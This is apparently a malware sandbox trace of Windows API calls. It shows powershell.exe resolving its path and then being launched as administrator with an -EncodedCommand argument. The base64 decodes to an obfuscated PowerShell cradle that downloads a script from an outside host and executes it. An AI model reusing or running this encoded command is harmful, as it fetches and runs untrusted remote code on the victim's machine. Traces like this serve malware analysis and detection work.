	[0702.354] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.354] SetErrorMode (uMode=0x1) returned 0x1
	[0702.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.355] SetErrorMode (uMode=0x1) returned 0x1
	[0702.355] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.355] SetErrorMode (uMode=0x1) returned 0x1
	[0702.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.355] SetErrorMode (uMode=0x1) returned 0x1
	[0702.355] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.356] SetErrorMode (uMode=0x1) returned 0x1
	[0702.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.356] SetErrorMode (uMode=0x1) returned 0x1
	[0702.356] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.356] SetErrorMode (uMode=0x1) returned 0x1
	[0702.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.357] SetErrorMode (uMode=0x1) returned 0x1
	[0702.357] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.357] SetErrorMode (uMode=0x1) returned 0x1
	[0702.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.357] SetErrorMode (uMode=0x1) returned 0x1
	[0702.357] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.357] SetErrorMode (uMode=0x1) returned 0x1
	[0702.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.358] SetErrorMode (uMode=0x1) returned 0x1
	[0702.358] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.358] SetErrorMode (uMode=0x1) returned 0x1
	[0702.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.358] SetErrorMode (uMode=0x1) returned 0x1
	[0702.358] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.359] SetErrorMode (uMode=0x1) returned 0x1
	[0702.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.359] SetErrorMode (uMode=0x1) returned 0x1
	[0702.359] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.359] SetErrorMode (uMode=0x1) returned 0x1
	[0702.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.360] SetErrorMode (uMode=0x1) returned 0x1
	[0702.360] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.360] SetErrorMode (uMode=0x1) returned 0x1
	[0702.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.360] SetErrorMode (uMode=0x1) returned 0x1
	[0702.360] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.361] SetErrorMode (uMode=0x1) returned 0x1
	[0702.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.361] SetErrorMode (uMode=0x1) returned 0x1
	[0702.361] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.361] SetErrorMode (uMode=0x1) returned 0x1
	[0702.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.361] SetErrorMode (uMode=0x1) returned 0x1
	[0702.362] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.362] SetErrorMode (uMode=0x1) returned 0x1
	[0702.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.362] SetErrorMode (uMode=0x1) returned 0x1
	[0702.362] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.362] SetErrorMode (uMode=0x1) returned 0x1
	[0702.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.363] SetErrorMode (uMode=0x1) returned 0x1
	[0702.363] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.363] SetErrorMode (uMode=0x1) returned 0x1
	[0702.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0702.363] SetErrorMode (uMode=0x1) returned 0x1
	[0702.364] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.364] SetErrorMode (uMode=0x1) returned 0x1
	[0702.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0702.364] SetErrorMode (uMode=0x1) returned 0x1
	[0702.364] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.365] SetErrorMode (uMode=0x1) returned 0x1
	[0702.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0702.365] SetErrorMode (uMode=0x1) returned 0x1
	[0702.365] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.365] SetErrorMode (uMode=0x1) returned 0x1
	[0702.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0702.366] SetErrorMode (uMode=0x1) returned 0x1
	[0702.366] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.366] SetErrorMode (uMode=0x1) returned 0x1
	[0702.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0702.366] SetErrorMode (uMode=0x1) returned 0x1
	[0702.366] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x26e1c0
	[0702.367] FindNextFileW (in: hFindFile=0x26e1c0, lpFindFileData=0x1c83d8b0 | out: lpFindFileData=0x1c83d8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0702.368] FindClose (in: hFindFile=0x26e1c0 | out: hFindFile=0x26e1c0) returned 1
	[0702.368] SetErrorMode (uMode=0x1) returned 0x1
	[0702.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c83d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0702.369] SetErrorMode (uMode=0x1) returned 0x1
	[0702.369] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c83dbd0 | out: lpFileInformation=0x1c83dbd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0702.369] SetErrorMode (uMode=0x1) returned 0x1
	[0702.370] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0702.370] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0702.370] CoTaskMemFree (pv=0x1aa380) 
	[0702.372] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0702.372] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0702.372] CoTaskMemFree (pv=0x1aa380) 
	[0702.375] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0702.375] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0702.376] CoTaskMemFree (pv=0x1aa380) 
	[0704.242] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0704.242] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0704.242] CoTaskMemFree (pv=0x1aa380) 
	[0704.255] CoTaskMemAlloc (cb=0x3b) returned 0x25d410
	[0704.256] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c83ddb8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c83ddb8) returned 0x4550
	[0704.257] CoTaskMemFree (pv=0x25d410) 
	[0704.260] GetConsoleWindow () returned 0x1051a
	[0704.267] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0704.268] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0704.268] CoTaskMemFree (pv=0x1aa380) 
	[0704.269] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0704.269] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0704.269] CoTaskMemFree (pv=0x1aa380) 
	[0704.275] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0704.275] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0704.275] CoTaskMemFree (pv=0x1aa380) 
	[0704.280] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c83de00 | out: pNumArgs=0x1c83de00) returned 0x1b870760*=""
	[0706.030] lstrlenW (lpString="-EncodedCommand") returned 15
	[0706.030] CoTaskMemAlloc (cb=0x22) returned 0x1b8825d0
	[0706.031] RtlMoveMemory (in: Destination=0x1b8825d0, Source=0x1b870782, Length=0x20 | out: Destination=0x1b8825d0) 
	[0706.031] CoTaskMemFree (pv=0x1b8825d0) 
	[0706.031] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0706.031] CoTaskMemAlloc (cb=0x2f4) returned 0x1ddfb0
	[0706.031] RtlMoveMemory (in: Destination=0x1ddfb0, Source=0x1b8707a2, Length=0x2f2 | out: Destination=0x1ddfb0) 
	[0706.031] CoTaskMemFree (pv=0x1ddfb0) 
	[0706.032] LocalFree (hMem=0x1b870760) returned 0x0
	[0706.035] CoTaskMemAlloc (cb=0x804) returned 0x1b890100
	[0706.035] GetConsoleTitleW (in: lpConsoleTitle=0x1b890100, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0706.035] CoTaskMemFree (pv=0x1b890100) 
	[0706.045] CoTaskMemAlloc (cb=0x38e) returned 0x1b870760
	[0706.045] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c83dd60*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2e3b7f0 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2e3b7f0*(hProcess=0x398, hThread=0x34c, dwProcessId=0x1f94, dwThreadId=0x1f98)) 